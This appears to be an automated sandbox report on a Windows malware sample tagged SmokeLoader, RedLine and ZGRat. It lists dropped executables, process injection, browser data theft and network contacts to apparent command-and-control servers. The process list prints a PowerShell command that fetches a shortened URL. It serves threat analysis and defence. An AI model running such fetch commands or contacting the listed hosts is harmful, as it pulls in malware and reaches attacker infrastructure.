Malware Analysis Report

2025-03-15 05:17

Sample ID 231218-1jq79sdedj
Target b6495a9c6a890740db6f41bf37af8427.exe
SHA256 816640f101b9440dc8892bf84720ac50afe8fe11888574fa8b81af8caae19aa7
Tags
smokeloader redline livetraffic up3 backdoor infostealer trojan zgrat discovery rat spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

816640f101b9440dc8892bf84720ac50afe8fe11888574fa8b81af8caae19aa7

Threat Level: Known bad

The file b6495a9c6a890740db6f41bf37af8427.exe was found to be: Known bad.

Malicious Activity Summary

smokeloader redline livetraffic up3 backdoor infostealer trojan zgrat discovery rat spyware stealer

Smokeloader family

RedLine payload

SmokeLoader

RedLine

ZGRat

Detect ZGRat V1

Downloads MZ/PE file

Reads user/profile data of web browsers

Deletes itself

Executes dropped EXE

Looks up external IP address via web service

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Unsigned PE

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Checks SCSI registry key(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-18 21:41

Signatures

Smokeloader family

smokeloader

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-18 21:41

Reported

2023-12-18 21:43

Platform

win7-20231215-en

Max time kernel

32s

Max time network

34s

Command Line

"C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9F3C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BCAC.exe N/A

Legitimate hosting services abused for malware hosting/C2

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1224 wrote to memory of 2748 N/A N/A C:\Users\Admin\AppData\Local\Temp\9F3C.exe
PID 1224 wrote to memory of 1132 N/A N/A C:\Users\Admin\AppData\Local\Temp\BCAC.exe

Processes

C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe

"C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe"

C:\Users\Admin\AppData\Local\Temp\9F3C.exe

C:\Users\Admin\AppData\Local\Temp\9F3C.exe

C:\Users\Admin\AppData\Local\Temp\BCAC.exe

C:\Users\Admin\AppData\Local\Temp\BCAC.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\C42B.exe

C:\Users\Admin\AppData\Local\Temp\C42B.exe

Network

Country Destination Domain Proto
RU 185.215.113.68:80 185.215.113.68 tcp
US 8.8.8.8:53 bitbucket.org udp
US 104.192.141.1:443 bitbucket.org tcp
US 104.192.141.1:443 bitbucket.org tcp
RU 5.42.65.125:80 5.42.65.125 tcp
RU 77.105.132.87:17066 tcp
US 8.8.8.8:53 github.com udp
DE 140.82.121.4:443 github.com tcp
DE 140.82.121.4:443 github.com tcp

Files

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-18 21:41

Reported

2023-12-18 21:43

Platform

win10v2004-20231215-en

Max time kernel

45s

Max time network

85s

Command Line

"C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\B882.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E7B1.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3492 wrote to memory of 3756 N/A N/A C:\Users\Admin\AppData\Local\Temp\B882.exe
PID 3492 wrote to memory of 4324 N/A N/A C:\Users\Admin\AppData\Local\Temp\E7B1.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe

"C:\Users\Admin\AppData\Local\Temp\b6495a9c6a890740db6f41bf37af8427.exe"

C:\Users\Admin\AppData\Local\Temp\B882.exe

C:\Users\Admin\AppData\Local\Temp\B882.exe

C:\Users\Admin\AppData\Local\Temp\E7B1.exe

C:\Users\Admin\AppData\Local\Temp\E7B1.exe

C:\Users\Admin\AppData\Local\Temp\51E.exe

C:\Users\Admin\AppData\Local\Temp\51E.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\B39.exe

C:\Users\Admin\AppData\Local\Temp\B39.exe

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c install.bat

C:\Users\Admin\AppData\Local\Temp\is-OUMNA.tmp\tuc3.tmp

"C:\Users\Admin\AppData\Local\Temp\is-OUMNA.tmp\tuc3.tmp" /SL5="$B0046,7276951,68608,C:\Users\Admin\AppData\Local\Temp\tuc3.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/3RmFzgo'"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\11C2.exe

C:\Users\Admin\AppData\Local\Temp\11C2.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 83.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 81.171.91.138.in-addr.arpa udp
RU 185.215.113.68:80 185.215.113.68 tcp
US 8.8.8.8:53 68.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 bitbucket.org udp
US 104.192.141.1:443 bitbucket.org tcp
US 8.8.8.8:53 bbuseruploads.s3.amazonaws.com udp
US 3.5.29.78:443 bbuseruploads.s3.amazonaws.com tcp
US 8.8.8.8:53 78.29.5.3.in-addr.arpa udp
US 8.8.8.8:53 1.141.192.104.in-addr.arpa udp
RU 77.105.132.87:17066 tcp
US 8.8.8.8:53 87.132.105.77.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
RU 5.42.65.125:80 5.42.65.125 tcp
US 8.8.8.8:53 125.65.42.5.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
DE 140.82.121.3:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 3.121.82.140.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 104.237.62.212:80 api.ipify.org tcp

Files
